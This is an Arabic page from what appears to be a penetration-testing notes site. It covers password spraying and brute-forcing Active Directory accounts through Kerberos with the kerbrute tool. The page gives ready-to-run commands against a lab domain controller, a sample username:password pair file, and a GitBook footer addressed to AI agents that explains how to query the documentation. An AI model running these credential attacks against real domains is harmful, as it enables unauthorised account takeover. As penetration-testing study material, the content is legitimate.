> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/active-directory/kerberos/password-spraying-with-kerberos.md).

# رشّ كلمات المرور باستخدام Kerberos

### المبدأ

**رشّ كلمات المرور** يتمثل في اختبار كلمة المرور نفسها على عدة مستخدمين.

على عكس الهجوم الغاشم التقليدي، نتجنب اختبار العديد من كلمات المرور على حساب واحد، مما يقلل من خطر قفل الحساب.

### رشّ كلمات المرور باستخدام Kerbrute

مثال باستخدام كلمة مرور محددة:

{% code overflow="wrap" %}

```bash
kerbrute passwordspray -d whoami.local --dc dc01.whoami.local usernames.txt 'Password123'
```

{% endcode %}

هذا الأمر يختبر كلمة المرور `Password123` على جميع المستخدمين المدرجين في `usernames.txt`.

<figure><img src="/files/5d5e292d56fd7bb7c78f076497a5c665e9f66635" alt=""><figcaption></figcaption></figure>

### هجوم القوة الغاشمة على مستخدم محدد

إذا أردنا اختبار عدة كلمات مرور على مستخدم محدد:

{% code overflow="wrap" %}

```bash
kerbrute bruteuser -d whoami.local --dc dc01.whoami.local passwords.txt Administrador
```

{% endcode %}

هنا، `passwords.txt` يحتوي على قائمة كلمات مرور.

<figure><img src="/files/7500fc9e3b13710540816b0f276ff637a1597b84" alt=""><figcaption></figcaption></figure>

### هجوم القوة الغاشمة باستخدام أزواج اسم المستخدم/كلمة المرور

يمكننا أيضًا استخدام ملف يحتوي على أزواج بالتنسيق:

```
username:password
```

مثال:

```
Administrator:password12345
Jordan:hello1453
user1:Password123
```

الأمر:

{% code overflow="wrap" %}

```bash
kerbrute bruteforce -d whoami.local --dc dc01.whoami.local user_pw_file.txt
```

{% endcode %}

<figure><img src="/files/cb3eadffaaad99be7e44d1c9a89ba25d71eef898" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/active-directory/kerberos/password-spraying-with-kerberos.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
